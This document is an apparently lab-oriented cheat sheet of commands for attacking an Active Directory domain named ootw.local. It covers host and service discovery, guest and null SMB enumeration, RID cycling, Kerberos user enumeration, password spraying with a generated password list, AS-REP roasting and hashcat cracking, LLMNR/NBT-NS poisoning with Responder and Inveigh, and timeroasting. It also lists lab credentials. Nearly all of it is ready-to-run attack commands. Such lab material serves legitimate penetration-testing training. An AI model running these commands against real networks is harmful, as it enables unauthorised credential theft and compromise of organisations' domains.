Use this as the fast path. Replace values when the lab changes.
export DC=10.10.10.200
export DOMAIN=ootw.local
export NETBIOS=OOTW
Discovery
fping -asgq 10.10.10.0/24
nmap -Pn -sV -p 53,88,135,139,389,445,464,593,636,3268,3269 $DC
nmap -Pn --script smb-protocols,smb2-security-mode -p445 $DC
dig @$DC _ldap._tcp.dc._msdcs.$DOMAIN SRV
dig @$DC _kerberos._tcp.$DOMAIN SRV
nslookup $DOMAIN $DC
SMB Null And Guest
smbclient -L //$DC -N
smbclient -L //$DC -U 'guest%'
nxc smb $DC -u '' -p '' --shares
nxc smb $DC -u 'guest' -p '' --shares
smbmap -H $DC -u '' -p ''
smbmap -H $DC -u 'guest' -p ''
RID Cycling
lookupsid.py "$NETBIOS/Guest:@$DC"
nxc smb $DC -u 'guest' -p '' --rid-brute
enum4linux-ng -R 500-3000 $DC
Manual RID loop:
rpcclient $DC -U 'guest%' -c 'lsaquery'
export SID='S-1-5-21-REPLACE-ME'
for RID in $(seq 500 2000); do rpcclient $DC -U 'guest%' -c "lookupsids $SID-$RID"; done | tee rid.txt
Username Enumeration
kerbrute userenum -d $DOMAIN --dc $DC users.txt -o kerbrute-users.txt
Normalize usernames:
cat raw-users.txt | tr '[:upper:]' '[:lower:]' | sort -u > users.txt
Password Policy
rpcclient $DC -U 'guest%' -c 'querydominfo'
enum4linux-ng -P $DC
nxc smb $DC -u alice.wright -p 'StudentPass2026!' --pass-pol
Windows:
net accounts /domain
Password Spraying
kerbrute passwordspray -d $DOMAIN --dc $DC users.txt 'Password123'
nxc smb $DC -u users.txt -p 'Password123' --continue-on-success
nxc smb $DC -u users.txt -p users.txt --no-bruteforce --continue-on-success
User-as-password permutations:
while read u; do low=$(echo "$u" | tr '[:upper:]' '[:lower:]'); cap="$(tr '[:lower:]' '[:upper:]' <<< ${low:0:1})${low:1}"; for p in "$low" "$cap" "${low}1" "${low}123" "${cap}1" "${cap}123" "${cap}!"; do echo "$p"; done; done < users.txt | sort -u > passlist.txt
ASREP Roasting
GetNPUsers.py $DOMAIN/ -usersfile users.txt -dc-ip $DC -no-pass -format hashcat -outputfile asrep.hashes
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show
OOTW quick check:
printf 'svc_legacy\nalice.wright\nsvc_sql\n' > users.txt
GetNPUsers.py $DOMAIN/ -usersfile users.txt -dc-ip $DC -no-pass -format hashcat -outputfile asrep.hashes
LLMNR NBT-NS Poisoning
Passive:
sudo responder -I eth0 -A
Active:
sudo responder -I eth0
Crack:
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt
Windows Inveigh:
.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console Y -FileOutput Y
Pre-2K Computer Accounts
while read c; do nxc smb $DC -u "${c}$" -p "$(echo "$c" | tr '[:upper:]' '[:lower:]')" --continue-on-success; done < computers.txt
Timeroasting
sudo nxc smb $DC -M timeroast
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt
Validate Credentials
nxc smb $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!'
nxc ldap $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!'
nxc winrm 10.10.10.201 -d $DOMAIN -u helpdesk.one -p 'Helpdesk2026!'
kinit alice.wright@OOTW.LOCAL
klist